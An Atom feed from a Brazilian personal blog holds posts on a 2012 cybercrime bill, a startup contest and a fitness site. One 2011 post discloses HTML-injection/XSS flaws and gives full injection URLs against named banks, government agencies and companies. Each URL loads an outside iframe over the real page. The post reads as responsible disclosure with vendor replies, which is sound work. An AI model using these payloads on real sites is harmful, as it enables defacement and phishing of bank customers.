<?xml version="1.0" encoding="iso-8859-1"?>
<feed xmlns="http://www.w3.org/2005/Atom"
	xml:lang="pt">
	<title>metaldot</title>
	<subtitle>blog colaborativo</subtitle>
        <link rel="alternate" type="text/html" href="http://metaldot.alucinados.com/index.php"/>
        <link rel="self" type="application/atom+xml" href="http://metaldot.alucinados.com/atom.xml"/>
	<updated>2012-09-28T10:19:44-03:00</updated>
	<author>
	<name>admin</name>
	<uri>http://metaldot.alucinados.com/index.php</uri>
	<email>metal@alucinados.com</email>
	</author>
	<id>tag:metaldot,2012:metaldot</id>
	<generator uri="http://www.pivotlog.net" version="Pivot - 1.40.8: 'Dreadwind'">Pivot</generator>
	<rights>Copyright (c) 2012, Authors of metaldot</rights>
	
	
	
	<entry>
		<title>Cuidado para não gerar uma legislação que só atenda uma demanda num momento de pânico</title>
		<link rel="alternate" type="text/html" href="http://metaldot.alucinados.com/pivot/entry.php?id=59&amp;w=my_weblog" />
		<updated>2012-05-16T12:17:00-03:00</updated>
		<published>2012-05-16T02:39:00-03:00</published>
		<id>tag:metaldot,2012:metaldot.59</id>
		<link rel="related" type="text/html" href=""  />
		<summary type="text">Fiquei triste e com medo ao ler que a Câmara aprovou numa votação simbólica (que durou 5 minutos) o Projeto de Lei 2793/11 comandado pelo Deputado Paulo Teixeira (PT-SP) que tipifica crimes cibernéticos. Fiquei triste porque o Marco Civil da Internet deveria ser discutido e votado primeiro e aí sim depois discutir projetos de criminalização. Mas o Marco Civil passou um bom tempo na gaveta até começar a ser instalado =/

15/05/2012 18:28 - Plenário inicia sessão para votar projeto sobre crimes cibernéticos
15/05/2012 18:33 - Câmara aprova projeto sobre crimes cibernéticos

Ao ler a notícia sobre a votação do PL 2793/11, a primeira coisa que pensei foi o caso do vazamento das fotos da atriz Carolina Dieckmann e qual seria a influência nesse caso, uma vez que não é a primeira vez que algo é votado por "clamor público" e/ou "movido pelo pânico".

"Depois da morte do garoto João Hélio, de seis anos, no Rio Janeiro, a Câmara dos Deputados acelerou os trabalhos e aprovou, em regime de urgência, alterações legislativas de combate à criminalidade que estavam engavetadas há pelo menos um ano. Os três projetos aprovados devem seguir agora para análise do Senado Federal e, se não sofrerem alterações, seguir à sanção presidencial."

Nessa correria provocada pelo "clamor público" devido a insegurança gerada pelos grandes veículos de comunicação porque um dos criminosos era menor de idade, a maioridade penal baixou para 16 anos e teve gente que pediu para baixar para 13 anos.

Outro exemplo foi a sequência de ataques DoS em sites .gov.br no ano passado (até me chamaram de "hacker do bem", para diversão da Yaso e da Dani). Confesso que achei que o AI-5 Digital do nosso querido Deputado Eduardo Azeredo seria aprovado na mesma semana. Ufá! Ainda bem, não foi.

Lembrei do caso do garoto João Hélio porque quando fui trabalhar na Secretaria de Assuntos Legislativos (SAL) do Ministério da Justiça, o Ricardo Poppi me mostrou um vídeo onde o ex-Secretário Pedro Abramovay falava sobre o cuidado para não gerar uma legislação que só atenda uma demanda num momento de pânico (Fica a dica pro Poppi publicar o video).

E a pergunta que fica é, quais são as consequências de aprovar leis no calor do momento?

Para jogar mais lenha na fogueira, "o presidente da Câmara, o Deputado  Marco Maia disse que a Câmara precisa construir mecanismos para permitir um filtro entre a "boa e a má informação" (como mentiras) veiculadas em redes sociais. "Precisamos no curto e médio prazos aproximar a evolução do mundo tecnológico e a legislação para garantir a liberdade de expressão", disse."

Pelo jeito, ele é mais um Deputado que defende a censura da rede e é a favor do AI-5 Digital.</summary>
        <content type="html" xml:lang="pt" xml:base="http://metaldot.alucinados.com/pivot/entry.php?id=59&amp;w=my_weblog"><![CDATA[
                Fiquei triste e com medo ao ler que a Câmara aprovou numa votação simbólica (que durou 5 minutos) o Projeto de Lei <a href="http://www.camara.gov.br/proposicoesWeb/fichadetramitacao?idProposicao=529011" title="2793/11">2793/11</a> comandado pelo Deputado <a href="http://www.camara.gov.br/internet/deputado/dep_Detalhe.asp?id=528722" title="Deputado Paulo Teixeira (PT-SP)">Paulo Teixeira</a> (PT-SP) que tipifica crimes cibernéticos. Fiquei triste porque o <a href="http://pt.wikipedia.org/wiki/Marco_Civil_da_Internet" title="Marco Civil da Internet">Marco Civil da Internet</a> deveria ser discutido e votado primeiro e aí sim depois discutir projetos de criminalização. Mas o <a href="http://culturadigital.br/marcocivil/" title="Marco Civil">Marco Civil</a> passou um bom tempo <a href="http://culturadigital.br/marcocivil/2011/10/27/marco-civil-encaminhado-ao-congress/" title="na gaveta">na gaveta</a> até <a href="http://culturadigital.br/marcocivil/2012/04/25/comissao-especial-do-marco-civil-da-internet-na-camara-dos-deputados/" title="começar a ser instalado">começar a ser instalado</a> =/<br />
<br />
15/05/2012 18:28 - <a href="http://www2.camara.gov.br/agencia/noticias/CIENCIA-E-TECNOLOGIA/417345-PLENARIO-INICIA-SESSAO-PARA-VOTAR-PROJETO-SOBRE-CRIMES-CIBERNETICOS.html" title="Plenário inicia sessão para votar projeto sobre crimes cibernéticos">Plenário inicia sessão para votar projeto sobre crimes cibernéticos</a><br />
15/05/2012 18:33 - <a href="http://www2.camara.gov.br/agencia/noticias/CIENCIA-E-TECNOLOGIA/417347-CAMARA-APROVA-PROJETO-SOBRE-CRIMES-CIBERNETICOS.html" title="Câmara aprova projeto sobre crimes cibernéticos">Câmara aprova projeto sobre crimes cibernéticos</a><br />
<br />
Ao ler a notícia sobre a votação do PL 2793/11, a primeira coisa que pensei foi o caso do vazamento das fotos da atriz <a href="http://www.sedentario.org/polemica-escandalo/fotos-de-carolina-dieckmann-nua-e-pelada-caem-na-rede-53692" title="Carolina Dieckmann">Carolina Dieckmann</a> e qual seria a influência nesse caso, uma vez que não é a primeira vez que algo é votado por "clamor público" e/ou "movido pelo pânico".<br />
<br />
"Depois da morte do garoto João Hélio, de seis anos, no Rio Janeiro, a <a href="http://www.conjur.com.br/2007-fev-20/congresso_analisa_oito_projetos_leis_penais" title="Câmara dos Deputados acelerou os trabalhos">Câmara dos Deputados acelerou os trabalhos</a> e aprovou, em regime de urgência, alterações legislativas de combate à criminalidade que estavam engavetadas há pelo menos um ano. Os três projetos aprovados devem seguir agora para análise do Senado Federal e, se não sofrerem alterações, seguir à sanção presidencial."<br />
<br />
Nessa correria provocada pelo "clamor público" devido a <a href="http://amaivos.uol.com.br/amaivos09/noticia/noticia.asp?cod_noticia=3535&cod_canal=31" title="insegurança gerada pelos grandes veículos de comunicação">insegurança gerada pelos grandes veículos de comunicação</a> porque um dos criminosos era menor de idade, a maioridade penal baixou para 16 anos e teve gente que pediu para baixar para 13 anos.<br />
<br />
Outro exemplo foi a sequência de <a href="http://pt.wikipedia.org/wiki/Ataque_de_nega%C3%A7%C3%A3o_de_servi%C3%A7o" title="ataques DoS">ataques DoS</a> em sites .gov.br no ano passado (até me chamaram de "<a href="http://www.correiobraziliense.com.br/app/noticia/politica/2011/06/25/interna_politica,258376/hackers-do-bem-desaprovam-colegas-que-atacaram-sites-governamentais.shtml" title="hacker do bem">hacker do bem</a>", para diversão da <a href="http://ingraxa.eu/" title="Yaso">Yaso</a> e da <a href="http://miradas.com.br/" title="Dani">Dani</a>). Confesso que achei que o <a href="http://www.cartacapital.com.br/politica/o-ai-5-digital/" title="AI-5 Digital">AI-5 Digital</a> do nosso querido Deputado <a href="http://www.camara.gov.br/internet/deputado/Dep_Detalhe.asp?id=530080" title="Eduardo Azeredo">Eduardo Azeredo</a> seria aprovado na mesma semana. Ufá! Ainda bem, não foi.<br />
<br />
Lembrei do caso do garoto João Hélio porque quando fui trabalhar na Secretaria de Assuntos Legislativos (SAL) do Ministério da Justiça, o <a href="http://ricardopoppi.org/" title="Ricardo Poppi">Ricardo Poppi</a> me mostrou um vídeo onde o ex-Secretário <a href="http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CG0QFjAA&url=http%3A%2F%2Fpt.wikipedia.org%2Fwiki%2FPedro_Vieira_Abramovay&ei=0cGzT_2IHIag8QTj2tWKCQ&usg=AFQjCNHs8YK9kYlcnvHA6sOYULGARul7Tg" title="Pedro Abramovay">Pedro Abramovay</a> falava sobre o cuidado para não gerar uma legislação que só atenda uma demanda num momento de pânico (Fica a dica pro Poppi publicar o video).<br />
<br />
E a pergunta que fica é, quais são as consequências de aprovar leis no calor do momento?<br />
<br />
Para jogar mais lenha na fogueira, "o presidente da Câmara, o Deputado <a href="http://www.camara.gov.br/internet/deputado/dep_Detalhe.asp?id=523098" title="Deputado Marco Maia"> Marco Maia</a> disse que a Câmara <a href="http://edemocracia.camara.gov.br/web/marco-civil-da-internet/noticias/-/blogs/743073" title="precisa construir mecanismos">precisa construir mecanismos</a> para permitir um filtro entre a "boa e a má informação" (como mentiras) veiculadas em redes sociais. "Precisamos no curto e médio prazos aproximar a evolução do mundo tecnológico e a legislação para garantir a liberdade de expressão", disse."<br />
<br />
Pelo jeito, ele é mais um Deputado que defende a censura da rede e é a favor do AI-5 Digital.
		]]></content>
		<author>
			<name>metal</name>
		</author>
	</entry>
	
	
	
	<entry>
		<title>Primeiro prêmio da Fitnova</title>
		<link rel="alternate" type="text/html" href="http://metaldot.alucinados.com/pivot/entry.php?id=58&amp;w=my_weblog" />
		<updated>2012-03-25T18:20:00-03:00</updated>
		<published>2012-03-25T18:14:00-03:00</published>
		<id>tag:metaldot,2012:metaldot.58</id>
		<link rel="related" type="text/html" href=""  />
		<summary type="text">No dia 20 de março aconteceu o desafio Startup Minas Meetup e a Fitnova foi o projeto campeão. Em segundo lugar ficou Nota de Corte e em terceiro Meritt, Guiando Telecom e Meliuz.

A organização do desafio (Circuito Startup) classificou dez projetos e sorteou dois projetos durante o evento. Cada projeto tinha 2 minutos de apresentação para vender o peixe para uma banca de jurados composta por investidores e empreendedores, entre eles Rodolfo Zhouri (Endeavor), Gustavo Ziller (Aorta) e Simon Olson (Google).



Sobre o Startup Minas Meetup:

"O Startup Belo Horizonte é um encontro entre Empreendedores, Investidores, Incubadoras, Aceleradoras de Negócios, Mídia e interessados. Possui formato Happy Hour, facilitando e estimulando o diálogo entre um grande número de pessoas. Cada participante recebe uma identificação (nome, empresa e categoria), a partir daí, pode circular pelo salão e conversar com outras pessoas, de acordo com seu interesse. Trata-se de uma excelente oportunidade para ampliar sua rede de contatos, conhecendo pessoas com novas idéias, negócios inovadores ou mesmo investidores à procura de talentos."</summary>
        <content type="html" xml:lang="pt" xml:base="http://metaldot.alucinados.com/pivot/entry.php?id=58&amp;w=my_weblog"><![CDATA[
                No dia 20 de março aconteceu o desafio <a href="http://startupminas.com/" title="Startup Minas Meetup">Startup Minas Meetup</a> e a <a href="http://fitnova.com.br" title="Fitnova">Fitnova</a> foi o projeto campeão. Em segundo lugar ficou <a href="http://www.notadecorte.com.br/" title="Nota de Corte">Nota de Corte</a> e em terceiro <a href="http://www.meritt.com.br/" title="Meritt">Meritt</a>, <a href="http://www.guiandotelecom.com.br/" title="Guiando Telecom">Guiando Telecom</a> e <a href="http://www.meliuz.com.br/" title="Meliuz">Meliuz</a>.<br />
<br />
A organização do desafio (<a href="http://circuitostartup.com/" title="Circuito Startup">Circuito Startup</a>) classificou dez projetos e sorteou dois projetos durante o evento. Cada projeto tinha 2 minutos de apresentação para vender o peixe para uma banca de jurados composta por investidores e empreendedores, entre eles <a href="http://twitter.com/Rodolfo_Zhouri" title="Rodolfo Zhouri">Rodolfo Zhouri</a> (<a href="http://endeavor.org.br" title="Endeavor">Endeavor</a>), <a href="http://twitter.com/gziller" title="Gustavo Ziller">Gustavo Ziller</a> (<a href="http://aorta.com.br" title="Aorta">Aorta</a>) e <a href="http://twitter.com/simonolson" title="Simon Olson">Simon Olson</a> (Google).<br />
<br />
<a href='http://metaldot.alucinados.com/images/556939_275274019216985_100002031660533_619742_1344064802_n.jpg'  style='border: 0;' target="_self"  class='pivot-popuptext' ><img src="http://metaldot.alucinados.com/images/556939_275274019216985_100002031660533_619742_1344064802_n.thumb.jpg" border="0" alt="Equipe Fitnova" title="Equipe Fitnova" align="" class='pivot-popupimage' /></a><br />
<br />
Sobre o Startup Minas Meetup:<br />
<br />
"O Startup Belo Horizonte é um encontro entre Empreendedores, Investidores, Incubadoras, Aceleradoras de Negócios, Mídia e interessados. Possui formato Happy Hour, facilitando e estimulando o diálogo entre um grande número de pessoas. Cada participante recebe uma identificação (nome, empresa e categoria), a partir daí, pode circular pelo salão e conversar com outras pessoas, de acordo com seu interesse. Trata-se de uma excelente oportunidade para ampliar sua rede de contatos, conhecendo pessoas com novas idéias, negócios inovadores ou mesmo investidores à procura de talentos."
		]]></content>
		<author>
			<name>metal</name>
		</author>
	</entry>
	
	
	
	<entry>
		<title>Fitnova - Personal Trainer 2.0, Treinos Online e Fichas de Musculação</title>
		<link rel="alternate" type="text/html" href="http://metaldot.alucinados.com/pivot/entry.php?id=57&amp;w=my_weblog" />
		<updated>2012-02-27T10:16:00-03:00</updated>
		<published>2012-02-12T15:20:00-03:00</published>
		<id>tag:metaldot,2012:metaldot.57</id>
		<link rel="related" type="text/html" href=""  />
		<summary type="text">No final do mês de Agosto de 2011 sai de Brasília e voltei a morar em BH para participar da elaboração e do desenvolvimento do Fitnova. Após alguns meses de trabalho duro junto com César Calixto, Gabriel Torres, Rafael Jorge e Saulo Medeiros, colocamos o projeto no ar no dia 12 de janeiro de 2012.

O projeto inicial era um protótipo com poucas coisas, mas ao longo do tempo mudamos e acrescentamos muitas coisas. A versão inicial já saiu com cara de produto e não de um protótipo. Fizemos um catálogo de exercícios com mais de 1200 exercícios com vídeos e mais de 10.000 programas de treinamentos.

Como funciona?

Após cadastro no site, é necessário preencher um questionário com 15 perguntas para descobrirmos o seu nível de condicionamento físico atual. Terminando essa etapa, temos um segundo questionários com 8 perguntas sobre o objetivos do seu treino. Com os dois questionários respondidos, um treino é selecionado com as suas características. Daí é começar a treinar, movimente-se!




Sobre a Fitnova:

"A Fitnova surgiu para oferecer uma plataforma tecnológica com o propósito de combater o sedentarismo. A Fitnova acredita que todas as pessoas interessadas em praticar uma atividade devem receber o que há de mais atual na ciência do treinamento baseado em princípios científicos, independente da condição social. Nossa filosofia principal é atuar como uma ferramenta de combate ao sedentarismo e a filosofia que norteia nossos trabalhos é a disponibilização de treinamentos de alta qualidade desenvolvidas por experts para todos que podem ou não pagar."</summary>
        <content type="html" xml:lang="pt" xml:base="http://metaldot.alucinados.com/pivot/entry.php?id=57&amp;w=my_weblog"><![CDATA[
                No final do mês de Agosto de 2011 sai de Brasília e voltei a morar em BH para participar da elaboração e do desenvolvimento do <a href="http://fitnova.com.br" title="Fitnova">Fitnova</a>. Após alguns meses de trabalho duro junto com <a href="http://www.facebook.com/profile.php?id=100002499151708" title="César Calixto">César Calixto</a>, <a href="http://www.facebook.com/gabrieltorresvieira" title="Gabriel Torres">Gabriel Torres</a>, <a href="http://twitter.com/rafaeljorge8" title="Rafael Jorge">Rafael Jorge</a> e <a href="http://twitter.com/saulomedeiros" title="Saulo Medeiros">Saulo Medeiros</a>, colocamos o projeto no ar no dia 12 de janeiro de 2012.<br />
<br />
O projeto inicial era um protótipo com poucas coisas, mas ao longo do tempo mudamos e acrescentamos muitas coisas. A versão inicial já saiu com cara de produto e não de um protótipo. Fizemos um <a href="http://fitnova.com.br/exercicios/" title="catálogo de exercícios com mais de 1200 exercícios com vídeos">catálogo de exercícios com mais de 1200 exercícios com vídeos</a> e <a href="http://fitnova.com.br/cadastre" title="mais de 10.000 programas de treinamentos">mais de 10.000 programas de treinamentos</a>.<br />
<br />
Como funciona?<br />
<br />
Após cadastro no site, é necessário preencher um questionário com 15 perguntas para descobrirmos o seu nível de condicionamento físico atual. Terminando essa etapa, temos um segundo questionários com 8 perguntas sobre o objetivos do seu treino. Com os dois questionários respondidos, um treino é selecionado com as suas características. Daí é começar a treinar, movimente-se!<br />
<br />
<a href="http://fitnova.com.br/"><img border="0" src="http://fitnova.com.br/imgs/site/graph/logo_colorida.png" title="Fitnova" alt="Fitnova" /></a><br />
<br />
<br />
<a href="http://fitnova.com.br/sobre" title="Sobre a Fitnova">Sobre a Fitnova</a>:<br />
<br />
"A Fitnova surgiu para oferecer uma plataforma tecnológica com o propósito de combater o sedentarismo. A Fitnova acredita que todas as pessoas interessadas em praticar uma atividade devem receber o que há de mais atual na ciência do treinamento baseado em princípios científicos, independente da condição social. Nossa filosofia principal é atuar como uma ferramenta de combate ao sedentarismo e a filosofia que norteia nossos trabalhos é a disponibilização de treinamentos de alta qualidade desenvolvidas por experts para todos que podem ou não pagar."
		]]></content>
		<author>
			<name>metal</name>
		</author>
	</entry>
	
	
	
	<entry>
		<title>Vários bancos com falha de segurança (A saga continua)</title>
		<link rel="alternate" type="text/html" href="http://metaldot.alucinados.com/pivot/entry.php?id=55&amp;w=my_weblog" />
		<updated>2011-05-25T17:33:00-03:00</updated>
		<published>2011-05-20T23:11:00-03:00</published>
		<id>tag:metaldot,2012:metaldot.55</id>
		<link rel="related" type="text/html" href=""  />
		<summary type="text">Durante a entrevista que concedi a Rede Brasil Atual me perguntaram se eu tinha testado a falha em outros sites de bancos, eu respondi que não, que a minha intenção era os sites dos Ministérios. Mas quando cheguei em casa (já falei que sou curioso) comecei a testar em alguns bancos.

Logo já apareceram alguns:Banco AlfaBRB (Banco de Brasília)BANESE  (Banco do Estado de Sergipe)BANESTES (Banco do Estado do Espírito Santo)BANRINSUL (Banco do Estado do Rio Grande do Sul)BRP (Banco Ribeirão Preto)BSMB (Banco Sumitomo Mitsui Brasileiro)

Os bancos gastam muito dinheiro com segurança e sempre vendem aquela velha falsa sensação de segurança para os clientes. Todos os sites que acessei foram via https, aquele cadeado de segurança que aparece no Navegador, o que não quer dizer nada, se o banco não faz a parte dele.

Além dos bancos, alguns outros sites .gov.br: ANVISA (Agência Nacional de Vigilância Sanitária)TCEMG (Tribunal de Contas do Estado de Minas Gerais)

Outras empresas: IGUNIMED

Da mesma forma que fiz antes (Segurança Nacional), enviei email para todos os órgãos envolvidos e estou aguardando alguma resposta. Happy Hack!

Screenshots:
Bancos
Banco AlfaBANESE - Banco do Estado de SergipeBANESTES - Banco do Estado do Espírito Santo
BANRINSUL - Banco do Estado do Rio Grande do SulBRB - Banco de BrasíliaBRP - Banco Ribeirão Pretosem JavaScript)
http://www.smbcgroup.com.br/searchBrasilp/?SearchView&amp;Query=<script>window.onload=function(){document.write(&amp;#39;<body style="margin: 0px 0px"><iframe src="http://metal.mundobugado.org/banco_smbc" width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>&amp;#39;)}</script>
.gov.br
* ANVISA - Agência Nacional de Vigilância Sanitária (ou sem JavaScript)
https://sngpc.anvisa.gov.br/AcessoPersistir.asp?senha=a&amp;email=<script>window.onload=function(){document.write(&amp;#39;<body style="margin: 0px 0px"><iframe src="http://metal.mundobugado.org/anvisa/" width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>&amp;#39;)}</script>
* TCEMG - Tribunal de Contas do Estado de Minas Gerais
http://www.tce.mg.gov.br/?cod_secao=5P&amp;tipo=2&amp;url=Pesquisa_Processo.asp&amp;cod_secao_menu=5K&amp;cpf="></td></tr></table><iframe src="http://gnu.org" width="500" height="300">

Outras empresas
* IG (ou sem JavaScript)
http://busca.igbusca.com.br/app/search?first_o=IG&amp;q="><script>window.onload=function(){document.write(&amp;#39;<body style="margin: 0px 0px"><iframe src="http://metal.mundobugado.org/ig/" width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>&amp;#39;)}</script>
* UNIMED (ou sem JavaScript)
http://www.unimed.com.br/pct/index.jsp?cd_canal=49146&amp;cd_secao=49103&amp;query="><script>window.onload=function(){document.write(&amp;#39;<body style="margin: 0px 0px"><iframe src="http://metal.mundobugado.org/unimed/" width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>&amp;#39;)}</script>

UPDATE 24/05/2001 - 14h03
Mensagem do BANRINSUL:
Prezado Marcelo,
Esta vulnerabilidade já havia sido identificada pelos nossos técnicos e estava em processo de correção.
Graças ao seu comunicado este procedimento foi priorizado e a vulnerabilidade corrigida.
Agradecemos seu contato.

UPDATE 24/05/2001 - 18h00
BANESTES corrigiu pela metade a falha, retirando o método GET e deixando o POST =/
Além disso, existem outras URLs e parâmetros com a falha que você pode testar aqui e aqui.

UPDATE 25/05/2001 - 11h15
BRP corrigiu pela metade a falha (você pode ver aqui), mas já agradeceu:

Marcelo,
O Banco BRP agradece pela sua informação.
Att.
Tecnologia da Informação
Banco BRP

UPDATE 25/05/2001 - 15h35
BRP corrigiu tudo</summary>
        <content type="html" xml:lang="pt" xml:base="http://metaldot.alucinados.com/pivot/entry.php?id=55&amp;w=my_weblog"><![CDATA[
                Durante a <a href="http://www.redebrasilatual.com.br/temas/tecnologia/2011/05/sites-da-caixa-e-de-mais-10-orgaos-do-governo-federal-tem-falha-de-seguranca" title="Entrevista">entrevista que concedi a Rede Brasil Atual</a> me perguntaram se eu tinha testado a falha em outros sites de bancos, eu respondi que não, que a minha intenção era os sites dos <a href="http://pt.wikipedia.org/wiki/Minist%C3%A9rios_do_Brasil" title="Ministérios do Brasil">Ministérios</a>. Mas quando cheguei em casa (já falei que sou curioso) comecei a testar em alguns bancos.<br />
<br />
Logo já apareceram alguns:<ul><li>Banco Alfa</li><li>BRB (Banco de Brasília)</li><li>BANESE  (Banco do Estado de Sergipe)</li><li>BANESTES (Banco do Estado do Espírito Santo)</li><li>BANRINSUL (Banco do Estado do Rio Grande do Sul)</li><li>BRP (Banco Ribeirão Preto)</li><li>BSMB (Banco Sumitomo Mitsui Brasileiro)</li></ul><br />
<br />
Os bancos gastam muito dinheiro com segurança e sempre vendem aquela velha falsa sensação de segurança para os clientes. Todos os sites que acessei foram via <a href="http://pt.wikipedia.org/wiki/HTTPS" title="https">https</a>, aquele cadeado de segurança que aparece no <a href="http://pt.wikipedia.org/wiki/Navegador" title="Navegador">Navegador</a>, o que não quer dizer nada, se o banco não faz a parte dele.<br />
<br />
Além dos bancos, alguns outros sites .gov.br: <ul><li>ANVISA (Agência Nacional de Vigilância Sanitária)</li><li>TCEMG (Tribunal de Contas do Estado de Minas Gerais)</li></ul><br />
<br />
Outras empresas: <ul><li>IG</li><li>UNIMED</li></ul><br />
<br />
Da mesma forma que fiz antes (<a href="http://metaldot.alucinados.com/pivot/entry.php?id=54" title="Segurança Nacional">Segurança Nacional</a>), enviei email para todos os órgãos envolvidos e estou aguardando alguma resposta. Happy Hack!<br />
<br />
<b>Screenshots:</b><br />
<h3>Bancos</h3><br />
<table border="0" cellspacing="10"><tr valign="top"><td><a href='http://metaldot.alucinados.com/images/html_injection_banco_alfa.png'  style='border: 0;' target="_self"  class='pivot-popuptext' ><img src="http://metaldot.alucinados.com/images/html_injection_banco_alfa.thumb.png" border="0" alt="Banco Alfa" title="Banco Alfa" align="" class='pivot-popupimage' /></a><br /><a href="http://www.alfanet.com.br" title="Banco Alfa">Banco Alfa</a></td><td><a href='http://metaldot.alucinados.com/images/html_injection_banese.png'  style='border: 0;' target="_self"  class='pivot-popuptext' ><img src="http://metaldot.alucinados.com/images/html_injection_banese.thumb.png" border="0" alt="BANESE - Banco do Estado de Sergipe" title="BANESE - Banco do Estado de Sergipe" align="" class='pivot-popupimage' /></a><br /><a href="http://www.banese.com.br" title="BANESE - Banco do Estado de Sergipe">BANESE - Banco do Estado de Sergipe</a></td><td><a href='http://metaldot.alucinados.com/images/html_injection_banestes.png'  style='border: 0;' target="_self"  class='pivot-popuptext' ><img src="http://metaldot.alucinados.com/images/html_injection_banestes.thumb.png" border="0" alt="BANESTES - Banco do Estado do Espírito Santo" title="BANESTES - Banco do Estado do Espírito Santo" align="" class='pivot-popupimage' /></a><br /><a href="http://www.banestes.com.br" title="BANESTES - Banco do Estado do Espírito Santo">BANESTES - Banco do Estado do Espírito Santo</a></td></tr><tr valign="top"><br />
<td><a href='http://metaldot.alucinados.com/images/html_injection_banrinsul.png'  style='border: 0;' target="_self"  class='pivot-popuptext' ><img src="http://metaldot.alucinados.com/images/html_injection_banrinsul.thumb.png" border="0" alt="BANRINSUL - Banco do Estado do Rio Grande do Sul" title="BANRINSUL - Banco do Estado do Rio Grande do Sul" align="" class='pivot-popupimage' /></a><br /><a href="http://www.banrisul.com.br" title="BANRINSUL - Banco do Estado do Rio Grande do Sul">BANRINSUL - Banco do Estado do Rio Grande do Sul</a></td><td><a href='http://metaldot.alucinados.com/images/html_injection_brb.png'  style='border: 0;' target="_self"  class='pivot-popuptext' ><img src="http://metaldot.alucinados.com/images/html_injection_brb.thumb.png" border="0" alt="BRB - Banco de Brasília" title="BRB - Banco de Brasília" align="" class='pivot-popupimage' /></a><br /><a href="http://www.brb.com.br" title="BRB - Banco de Brasília">BRB - Banco de Brasília</a></td><td><a href='http://metaldot.alucinados.com/images/html_injection_brp.png'  style='border: 0;' target="_self"  class='pivot-popuptext' ><img src="http://metaldot.alucinados.com/images/html_injection_brp.thumb.png" border="0" alt="BRP - Banco Ribeirão Preto" title="BRP - Banco Ribeirão Preto" align="" class='pivot-popupimage' /></a><br /><a href="http://www.brp.com.br" title="BRP - Banco Ribeirão Preto">BRP - Banco Ribeirão Preto</a</td></tr><tr valign="top"><td><a href='http://metaldot.alucinados.com/images/html_injection_banco_sumitomo_mitsui.png'  style='border: 0;' target="_self"  class='pivot-popuptext' ><img src="http://metaldot.alucinados.com/images/html_injection_banco_sumitomo_mitsui.thumb.png" border="0" alt="BSMB (Banco Sumitomo Mitsui Brasileiro)" title="BSMB (Banco Sumitomo Mitsui Brasileiro)" align="" class='pivot-popupimage' /></a><br /><a href="http://www.smbcgroup.com.br" title="BSMB (Banco Sumitomo Mitsui Brasileiro)">BSMB (Banco Sumitomo Mitsui Brasileiro)</a></td></tr></table><br />
<br />
<h3>.gov.br</h3><br />
<table border="0" cellspacing="10"><tr valign="top"><td><a href='http://metaldot.alucinados.com/images/html_injection_anvisa.png'  style='border: 0;' target="_self"  class='pivot-popuptext' ><img src="http://metaldot.alucinados.com/images/html_injection_anvisa.thumb.png" border="0" alt="ANVISA - Agência Nacional de Vigilância Sanitária" title="ANVISA - Agência Nacional de Vigilância Sanitária" align="" class='pivot-popupimage' /></a><br /><a href="http://www.anvisa.gov.br" title="ANVISA - Agência Nacional de Vigilância Sanitária">ANVISA - Agência Nacional de Vigilância Sanitária</a></td><td><a href='http://metaldot.alucinados.com/images/html_injection_tcemg.png'  style='border: 0;' target="_self"  class='pivot-popuptext' ><img src="http://metaldot.alucinados.com/images/html_injection_tcemg.thumb.png" border="0" alt="TCEMG - Tribunal de Contas do Estado de Minas Gerais" title="TCEMG - Tribunal de Contas do Estado de Minas Gerais" align="" class='pivot-popupimage' /></a><br /><a href="http://www.tce.mg.gov.br" title="TCEMG - Tribunal de Contas do Estado de Minas Gerais">TCEMG - Tribunal de Contas do Estado de Minas Gerais</a></td></tr></table><br />
<br />
<h3>Outras empresas</h3><br />
<table border="0" cellspacing="10"><tr valign="top"><td><a href='http://metaldot.alucinados.com/images/html_injection_ig.png'  style='border: 0;' target="_self"  class='pivot-popuptext' ><img src="http://metaldot.alucinados.com/images/html_injection_ig.thumb.png" border="0" alt="IG" title="IG" align="" class='pivot-popupimage' /></a><br /><a href="http://www.ig.com.br" title="IG">IG</a></td><td><a href='http://metaldot.alucinados.com/images/html_injection_unimed.png'  style='border: 0;' target="_self"  class='pivot-popuptext' ><img src="http://metaldot.alucinados.com/images/html_injection_unimed.thumb.png" border="0" alt="UNIMED" title="UNIMED" align="" class='pivot-popupimage' /></a><br /><a href="http://www.unimed.com.br" title="UNIMED">UNIMED</a></td></tr></table><br />
<br />
<b>Segue os links com as páginas alteradas, para confirmar</b><br />
<h3>Bancos</h3><br />
* <a href="https://wwws.alfanet.com.br/busca.aspx?__VIEWSTATE=%3Cscript%3Ewindow.onload=function()%7Bdocument.write('%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/banco_alfa/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E')%7D%3C/script%3E">Banco Alfa</a> (ou <a href="https://wwws.alfanet.com.br/busca.aspx?__VIEWSTATE=%3Ciframe%20src=%22http://metal.mundobugado.org/banco_alfa%22%20width=%22500%22%20height=%22300%22%3E">sem JavaScript</a>)<br />
<code>https://wwws.alfanet.com.br/busca.aspx?__VIEWSTATE=&lt;script&gt;window.onload=function(){document.write(&#39;&lt;body style=&quot;margin: 0px 0px&quot;&gt;&lt;iframe src=&quot;http://metal.mundobugado.org/banco_alfa/&quot; width=&quot;1260&quot; height=&quot;2100&quot; frameborder=&quot;0&quot; marginheight=&quot;0&quot; marginwidth=&quot;0&quot; scrolling=&quot;no&quot;&gt;&lt;/body&gt;&#39;)}&lt;/script&gt;</code><br />
* <a href="https://wwws.banese.com.br/netbanking/index.jsp?Agencia=%22%3E%3Cscript%3Ewindow.onload=function()%7Bdocument.write('%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/banco_banese/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E')%7D%3C/script%3E">BANESE - Banco do Estado de Sergipe</a> (ou <a href="https://wwws.banese.com.br/netbanking/index.jsp?Agencia=%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/banco_banese%22%20width=%22500%22%20height=%22300%22%3E">sem JavaScript</a>)<br />
